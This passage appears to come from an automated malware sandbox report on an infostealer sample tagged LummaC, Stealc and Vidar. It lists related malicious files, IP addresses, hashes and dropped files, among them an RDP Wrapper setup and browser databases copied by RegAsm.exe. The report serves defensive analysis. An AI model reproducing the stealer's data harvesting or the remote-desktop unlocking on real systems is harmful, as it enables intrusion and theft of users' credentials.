	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254
	Payment copy.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\RDP Wrapper\rdpwrap.dll	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	smss.exe	Get hash	malicious	RMSRemoteAdmin, RDPWrap Tool, xRAT	Browse
	CVE-2024-38143 poc.exe	Get hash	malicious	Codoso Ghost, UACMe	Browse
	LisectAVT_2403002A_44.exe	Get hash	malicious	AveMaria, UACMe	Browse
	6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe	Get hash	malicious	AveMaria, UACMe	Browse
	234880953-042446-sanlccjavap0003-3849.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	YQR4CA11sP.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	jYHfnNP0MN.exe	Get hash	malicious	AveMaria, Blank Grabber, PrivateLoader, UACMe	Browse
	Filezillawin_94199_patched.exe	Get hash	malicious	Unknown	Browse
	PO7431.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
C:\ProgramData\BKFHCGIDBA.exe	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	5.884975745255681
Encrypted:	false
SSDEEP:	3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5:	461ADE40B800AE80A40985594E1AC236
SHA1:	B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256:	798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512:	421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: smss.exe, Detection: malicious, Browse Filename: CVE-2024-38143 poc.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_44.exe, Detection: malicious, Browse Filename: 6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe, Detection: malicious, Browse Filename: 234880953-042446-sanlccjavap0003-3849.exe, Detection: malicious, Browse Filename: YQR4CA11sP.exe, Detection: malicious, Browse Filename: jYHfnNP0MN.exe, Detection: malicious, Browse Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse Filename: PO7431.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Program Files\RDP Wrapper\rdpwrap.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	443552
Entropy (8bit):	5.4496544667416975
Encrypted:	false
SSDEEP:	768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
MD5:	92BC5FEDB559357AA69D516A628F45DC
SHA1:	6468A9FA0271724E70243EAB49D200F457D3D554
SHA-256:	85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
SHA-512:	87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\ProgramData\AEBAFBGIDHCB\AAFIJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\AEBAFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\DGHJEH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\FCFBFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\AEBAFBGIDHCB\GIEHJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\HIIEBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\JDBKJJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\JECAFH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\JECAFH-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\JKKECB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\KEBKJD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\KEBKJD-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AEBAFBGIDHCB\KKKJEB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFHCGIDBA.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\ProgramData\BKFHCGIDBAAF\CBFCBK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFHCGIDBAAF\GIIIIJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFHCGIDBAAF\JKEGHD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKJJEBKKEH.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\ProgramData\CFCBAAEBKEGHIEBFIJJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
